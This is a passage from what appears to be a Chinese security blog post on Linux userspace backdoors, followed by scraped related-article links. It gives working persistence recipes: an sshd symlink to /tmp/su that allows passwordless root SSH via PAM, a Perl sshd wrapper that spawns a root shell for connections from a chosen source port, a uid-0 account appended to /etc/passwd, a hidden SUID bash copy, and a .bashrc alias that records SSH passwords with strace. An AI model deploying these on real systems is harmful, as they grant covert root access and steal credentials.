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" alt="" />
通过注入命令实现端口转发,执行完这条命令后,我们就可以使用这台机器的9090端口做SOCKS5代理,访问下一跳的网段。同时不会增加新的TCP会话,而是复用了老的ssh会话,所以可以理解为是一个ssh隧道。
前面说过,如果ControlPersist为yes,则不会自动删除sockets文件,我们可以手工rm删除/tmp/root@112.124.20.20\:22,也可以优雅的使用
ssh -O exit -S /tmp/root@112.124.20.20\:22 %h
aaarticlea/png;base64,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" alt="" />
8. 利用ssh pam认证机制实现ssh root免密后门
0x1:实现过程
在被控制的服务器上执行如下指令,创建一个名为su的指向sshd的软链接。
ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort= &
然后打开一个新的登陆会话,账户root,密码任意,可以直接登录成功。
注意,被控制服务器(部署ssh后门的服务器)需要配置“允许root登录”以及“开启pam认证”。
0x2:实现原理
当进程名为su的进程启动时,由于其触发了auth登录验证(类似于在命令行执行su xxx指令)。系统会读取“/etc/pam.d/su”内的配置信息。
以ubuntu为例,
root@iZuf651jh0tfb2bx32x9lpZ:~# cat /etc/pam.d/su
#
# The PAM configuration file for the Shadow `su' service
# # This allows root to su without passwords (normal operation)
auth sufficient pam_rootok.so # Uncomment this to force users to be a member of group root
# before they can use `su'. You can also add "group=foo"
# to the end of this line if you want to use a group other
# than the default "root" (but this may have side effect of
# denying "root" user, unless she's a member of "foo" or explicitly
# permitted earlier by e.g. "sufficient pam_rootok.so").
# (Replaces the `SU_WHEEL_ONLY' option from login.defs)
# auth required pam_wheel.so # Uncomment this if you want wheel members to be able to
# su without a password.
# auth sufficient pam_wheel.so trust # Uncomment this if you want members of a specific group to not
# be allowed to use su at all.
# auth required pam_wheel.so deny group=nosu # Uncomment and edit /etc/security/time.conf if you need to set
# time restrainst on su usage.
# (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs
# as well as /etc/porttime)
# account requisite pam_time.so # This module parses environment configuration file(s)
# and also allows you to use an extended config
# file /etc/security/pam_env.conf.
#
# parsing /etc/environment needs "readenv=1"
session required pam_env.so readenv=
# locale variables are also kept into /etc/default/locale in etch
# reading this file *in addition to /etc/environment* does not hurt
session required pam_env.so readenv= envfile=/etc/default/locale # Defines the MAIL environment variable
# However, userdel also needs MAIL_DIR and MAIL_FILE variables
# in /etc/login.defs to make sure that removing a user
# also removes the user's mail spool file.
# See comments in /etc/login.defs
#
# "nopen" stands to avoid reporting new mail when su'ing to another user
session optional pam_mail.so nopen # Sets up user limits according to /etc/security/limits.conf
# (Replaces the use of /etc/limits in old login)
session required pam_limits.so # The standard Unix authentication modules, used with
# NIS (man nsswitch) as well as normal /etc/passwd and
# /etc/shadow entries.
@include common-auth
@include common-account
@include common-session
重点是这行:
auth sufficient pam_rootok.so
sufficient 表示只要这行满足,直接返回登录成功。
Linux man 手册上关于 pam_rootok.so 的介绍
看一下pam_rootok.so的源码,
关键点在于红框部分,模块会调用getuid(),如果get的uid为0,它会检查selinux的root是否为0或是否在启用selinux下为0,是0,则返回认证成功,否则认证失败。
在正常情况下,如果是root账户执行su指令,会直接忽略密码验证,这是系统设计这个机制的本意。
但是这里攻击者将sshd软连接为su进程,从而借助sudo的root免密验证机制,实现了免密ssh后门的目的。
Relevant Link:
https://www.freebuf.com/articles/system/138753.html
9. 利用perl实现sshd后门
0x1:后门代码实现
将原本的”/usr/sbin/sshd“备份,用下列这个perl脚本代替之,
#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
- exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/):如果当前文件句柄STDIN是一个socket,且socket的远程连接源端口是31334(Big 网络字节序中的16进制字符串为\x00\x00zf, 正好匹配上perl正则 ..zf),则执行/bin/sh,并结束当前程序运行(不会执行第二步),相当于反弹一个root shell (因为sshd 是以root权限运行的)给远程socket
- exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV:启动sshd (/usr/bin/sshd是真正的sshd)服务 ,凡是传递给/usr/sbin/sshd (后门)的参数都传递给真正的sshd (这一行保证了普通用户也可以正常使用ssh 服务,登录并不会有什么异常现象)
0x2:后门部署过程
# 将真正的sshd 移至/usr/bin/sshd,
mv /usr/sbin/sshd /usr/bin/sshd # 将后门sshd (perl脚本移动至/usr/sbin/sshd),并授予执行权限
chmod +x /usr/sbin/sshd # 重启 ssh 服务
/etc/init.d/ssh restart # 在控制端执行以下操作,即发起ssh后门连接:
socat STDIO TCP4:10.1.100.3:,sourceport=
这行命令的意思是说,将输入输出重定向至于socket 10.1.100.3:(部署了sshd后门的机器ip)。这样后门perl脚本中STDIN就是socket了, 且这个socket的源端口为31334 # 这行命令等价于
socat -TCP4:10.1.100.3:,sourceport=
这样就可以无需认证 (因为还未到sshd认证阶段就反弹root shell了),实现获取控制端系统shell的目的,也即一个ssh后门。
为了增强隐秘性, 我们可以将copy 一份/bin/sh, 重命名为/bin/sshd,修改后门源码为:
#!/usr/bin/perl
exec"/bin/sshd"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
控制端再次连接后查看网络连接情况,会看到有一个叫sshd的进程,打开了一个socket句柄。
Relevant Link:
https://www.freebuf.com/articles/system/140880.html
10. 系统后门账号添加
0x1:Windows $隐身账号
0x2:增加Linux root增加超级用户
echo "mx7krshell:x:0:0::/:/bin/sh" >> /etc/passwd
如果系统不允许uid=0的用户远程登录,可以增加一个普通用户账号
echo "mx7krshell::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
11. X置位后门
0x1:放置SUID Shell
普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。
cp /bin/bash /dev/.rootshell
chmod u+s /dev/.rootshell
12. Linux环境变量后门
0x1:alias 后门
当前用户目录下.bashrc
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology的更多相关文章
- Linux登录验证机制、SSH Bruteforce Login学习
相关学习资料 http://files.cnblogs.com/LittleHann/linux%E4%B8%AD%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E8%AE% ...
- 【Linux】常用的Linux可插拔认证模块(PAM)应用举例:pam_limits.so、pam_rootok.so和pam_userdb.so模块
常用的Linux可插拔认证模块(PAM)应用举例:pam_limits.so.pam_rootok.so和pam_userdb.so模块 pam_limits.so模块: pam_limits.so模 ...
- Linux系统学习 八、SSH服务—SSH远程管理服务
1.SSH简介 ssh(安全外壳协议)是Secure Shell的缩写,是建立在应用层和传输层基础上的安全协议.传输的时候是经过加密的,防止信息泄露,比telnet(明文传递)要安全很多. ftp安装 ...
- Security基础(一):Linux基本防护措施、使用sudo分配管理权限、提高SSH服务安全
一.Linux基本防护措施 目标: 本案例要求练习Linux系统的基本防护措施,完成以下任务: 修改用户zhangsan的账号属性,设置为2015-12-31日失效(禁止登录) 锁定用户lisi的账户 ...
- 【Linux】使用Google Authenticator 实现ssh登录双因素认证
一般来说,使用ssh远程登录服务器,只需要输入账号和密码,显然这种方式不是很安全.为了安全着想,可以使用GoogleAuthenticator(谷歌身份验证器),以便在账号和密码之间再增加一个验证码, ...
- Linux下使用Google Authenticator配置SSH登录动态验证码
1.一般ssh登录服务器,只需要输入账号和密码.2.本教程的目的:在账号和密码之间再增加一个验证码,只有输入正确的验证码之后,再输入密码才能登录.这样就增强了ssh登录的安全性.3.账号.验证码.密码 ...
- Linux内核 TCP/IP、Socket参数调优
Linux内核 TCP/IP.Socket参数调优 2014-06-06 Harrison.... 阅 9611 转 165 转藏到我的图书馆 微信分享: Doc1: /proc/sy ...
- Linux版OpenVPN安装、配置教程(转)
本文将以目前最新的openvpn-2.3.4.tar.gz(更新于2014-5-2,下载地址)为例来介绍如何在Linux系统中安装.配置及使用OpenVPN. 在这里,我们选用了一台预装CentOS ...
- Linux就这个范儿 第15章 七种武器 linux 同步IO: sync、fsync与fdatasync Linux中的内存大页面huge page/large page David Cutler Linux读写内存数据的三种方式
Linux就这个范儿 第15章 七种武器 linux 同步IO: sync.fsync与fdatasync Linux中的内存大页面huge page/large page David Cut ...
随机推荐
- C# Chrome内核
C#将WebBowser控件替换为Chrome内核 摘要 由于最近要做一个浏览器式的软件,其中有不少地方需要使用到jQuery和BootStrap,但是在C#中,默认的WebBrowser控件默认使用 ...
- eap
本文介绍了eap
- hadoop:将WordCount打包成独立运行的jar包
hadoop示例中的WordCount程序,很多教程上都是推荐以下二种运行方式: 1.将生成的jar包,复制到hadoop集群中的节点,然后运行 $HADOOP_HOME/bin/hadoop xxx ...
- hadoop 2.6伪分布安装
hadoop 2.6的“伪”分式安装与“全”分式安装相比,大部分操作是相同的,主要区别在于不用配置slaves文件,而且其它xxx-core.xml里的参数很多也可以省略,下面是几个关键的配置: (安 ...
- Struts2、Spring MVC4 框架下的ajax统一异常处理
本文算是struts2 异常处理3板斧.spring mvc4:异常处理 后续篇章,普通页面出错后可以跳到统一的错误处理页面,但是ajax就不行了,ajax的本意就是不让当前页面发生跳转,仅局部刷新, ...
- 大圆满的精髓–肯•威尔伯(KEN WILBER)
作者:肯·威尔伯(Ken Wilber),目前被公认为是“后人本心理学”的最重要的思想家.理论家和发言人,其影响已经跨越了心理学领域,波及哲学和神学领域.由于肯·威尔伯在意识领域的研究极富基础性和开创 ...
- Java7并发编程实战(一) 线程的中断
控制线程中断的方法一般常规是定义一个布尔值,然后while(布尔值) 去执行,当想停止该线程时候,把布尔值设为false. 这里我们来看第二种,Interrupt 该例子模拟一个线程从1打印到10,然 ...
- windows 下 redis for php 配置
下载 redis,下载地址 https://github.com/dmajkic/redis/downloads,下载下来 zip 文件,解压,根据系统选择解压的文件夹(比如我的是 64bit). 我 ...
- MVC Form异步请求
@using (Ajax.BeginForm("CreateReviewInfo", "Review", new AjaxOptions { HttpMetho ...
- 7z压缩文件时排除指定的文件
分享一个7z压缩文件时排除指定文件类型的命令行,感觉很有用: 7z a -t7z d:\updateCRM.7z d:\updateCRM\*.* -r -x!*.log -x!*bak a:创建压缩 ...